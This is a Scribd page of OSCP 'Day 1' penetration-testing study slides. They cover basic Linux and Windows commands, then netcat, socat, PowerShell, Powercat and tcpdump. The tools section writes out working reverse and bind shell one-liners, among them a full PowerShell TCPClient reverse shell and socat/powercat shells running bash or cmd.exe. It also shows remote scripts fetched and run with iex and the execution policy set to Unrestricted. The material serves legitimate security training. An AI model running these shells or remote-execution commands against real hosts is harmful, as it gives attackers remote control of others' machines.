Scribd
Upload
153 views

OSCP Day1

This document provides an overview of common Linux and Windows commands as well as practical tools used in penetration testing. It begins with basic commands for navigating files and directories, viewing file contents, finding files, and managing permissions. Next it covers networking tools like netcat, socat, PowerShell, and Powercat that can be used to transfer files and create various types of shells. It concludes with an introduction to tcpdump for capturing and analyzing network traffic. The document is intended as a day one reference for the OSCP certification which focuses on hands-on penetration testing skills.

Uploaded by

fa1c0n king
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
153 views

OSCP Day1

This document provides an overview of common Linux and Windows commands as well as practical tools used in penetration testing. It begins with basic commands for navigating files and directories, viewing file contents, finding files, and managing permissions. Next it covers networking tools like netcat, socat, PowerShell, and Powercat that can be used to transfer files and create various types of shells. It concludes with an introduction to tcpdump for capturing and analyzing network traffic. The document is intended as a day one reference for the OSCP certification which focuses on hands-on penetration testing skills.

Uploaded by

fa1c0n king
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 44

OSCP DAY1

Table of Contents
• Command Line Fun
• Practical Tools
BASIC LINUX & WINDOWS
COMMANDS
Linux Commands
The Shell – Bash
The shell, or the terminal is a really useful tool. Bash is the standard shell on most Linux distros.

• Navigating
pwd - Print working directory
cd - Change directory
cd ~ - Change directory to your home directory
Linux Commands
• Looking at files
ls - List files in directory
ls -ltr - Sort list by last modified. -time -reverse
file - Show info about file. What type of file it is. If it is a binary or text file for example.
cat - Output content of file.
more - Output file but just little bit at a time. less is better.
Linux Commands
• A little bit of everything
history - Show commands history
sudo
List what rights the sudo user has.
sudo -l

Sudo config file is usually /etc/sudoers


Linux Commands
• Working with files
touch - Create a new file.
cp - Copy
mkdir - Make directory.

rm - Remove file
Linux Commands
• Find
Find is slower than locate but a lot more thorough. You can search for files recursively and with regex
and a lot of other features.
Linux Commands
• Locate
Locate is really fast because it relies on an internal database. So in order to have it updated you need to
run:

Then you can easily find stuff like this:


Linux Commands
• Which
Outputs the path of the binary that you are looking for. It searches through the directories that are
defined in your $PATH variable.
Linux Commands
• filters
There are certain programs that are especially useful to use together with pipes. They can also be used
as stand-alone programs but you will often see them together with pipes.
sort

uniq

grep
head
tail
tr
Linux Commands
• cut
Cut by column
This is a useful command to cut in text.
Let's say that we have the following text, and we want to cut out the ip-address.

-d stands for delimiter. and -f for field.


Linux Commands
• tr – Translate
Transform all letter into capital letters

Example
Remove character
cat file.txt | tr –d “.”
Linux Commands
• awk
So awk is an advanced tool for editing text-files. It is its own programming language to it can become
quite complex. Awk iterates over the whole file line by line.
This is the basic structure of an awk command
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

The search pattern takes regex.


You can exclude the search portion or the action portion.
This just prints every line of the file.
Linux Commands
• awk
Filtering out specific ip-address:

Now we want to print out the fourth column of that file, we can just pipe this to cut, but we can also use
awk for it, like this:

We can use the -F flag to add a custom delimiter.


Linux Commands
• Permissions

Shows all the files and directories and their permission settings.

Here we have 10 letters in the beginning. The first one d shows that it is a directory.
The next three letters are for read, w for write and x for execute. The first three belong to the owner,
the second three to the group, and the last three to all users.

→ https://linuxjourney.com/lesson/file-permissions
Windows Commands
• Show hidden files

• Print out file content, like cat

• grep files
Windows Commands
• Processes
List processes
tracert

Kill a process
taskkill /PID 1532 /F
Windows Commands
• Users
PRACTICAL TOOLS
Practical Tools
• Netcat
• Socat
• PowerShell and Powercat
• Tcpdump
Practical Tools - netcat
• netcat
Listening on TCP/UDP Port
Windows → nc.exe –nlvp 4444
Linux → nc –nlvp 4444
Practical Tools - netcat
• netcat
Netcat Bind Shell
Practical Tools - netcat
• netcat
Netcat reverse Shell
Practical Tools - netcat
• Transferring Files with Netcat
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Practical Tools - socat
• Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
kali@kali:~$ nc <remote server's ip address> 80
kali@kali:~$ socat - TCP4:<remote server's ip address>:80

kali@kali:~$ sudo nc -lvp localhost 443


kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT
Practical Tools - socat
• Socat File Transfers
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create


C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"
Practical Tools - socat
• Socat Reverse Shells
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Practical Tools - PowerShell and Powercat
• Unrestricted
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
PS C:\WINDOWS\system32> Get-ExecutionPolicy
Practical Tools - PowerShell and Powercat
• PowerShell File Transfers
C:\Users\offsec> powershell -c "(new-object
System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Practical Tools - PowerShell and Powercat
• PowerShell Reverse Shells
Using nc to set up a listener in order to receive a reverse shell
kali@kali:~$ sudo nc -lnvp 443
Practical Tools - PowerShell and Powercat
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data
= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-
String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$clien
t.Close()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
powershell -c "$listener = New-Object
System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client =
$listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +
(pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyt
e.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
kali@kali:~$ nc -nv 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat
Powercat can be installed in Kali with apt install powercat, which will place the script in
/usr/share/windows-resources/powercat.
Practical Tools - PowerShell and Powercat
• Powercat
Loading a remote PowerShell script using iex
PS C:\Users\Offsec> iex (New-Object
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/m
aster/powercat.ps1')
Practical Tools - PowerShell and Powercat
• Powercat File Transfers
kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
Practical Tools - PowerShell and Powercat
• Powercat Reverse Shells
kali@kali:~$ sudo nc -lvp 443
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
Practical Tools - PowerShell and Powercat
• Powercat Bind Shells
Using powercat to set up a bind shell
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe

Using nc to connect to a bind shell created by powercat


kali@kali:~$ nc 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat Stand-Alone Payloads
Creating and executing a stand-alone payload
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

Receiving a stand-alone reverse shell


kali@kali:~$ sudo nc -lnvp 443

Executing an stand-alone payload using PowerShell


PS C:\Users\offsec> powershell.exe ./reverseshell.ps1
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to read packet capture
kali@kali:~$ sudo tcpdump -i eth0 –w password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap

Using tcpdump to read and filter the packet capture


kali@kali:~$ sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c
| head
Practical Tools - tcpdump
• tcpdump
Using tcpdump filters
kali@kali:~$ sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to read the packet capture in hex/ascii output
kali@kali:~$ sudo tcpdump -nX -r password_cracking_filtered.pcap

Using tcpdump with some advanced filtering


kali@kali:~$ sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
END

You might also like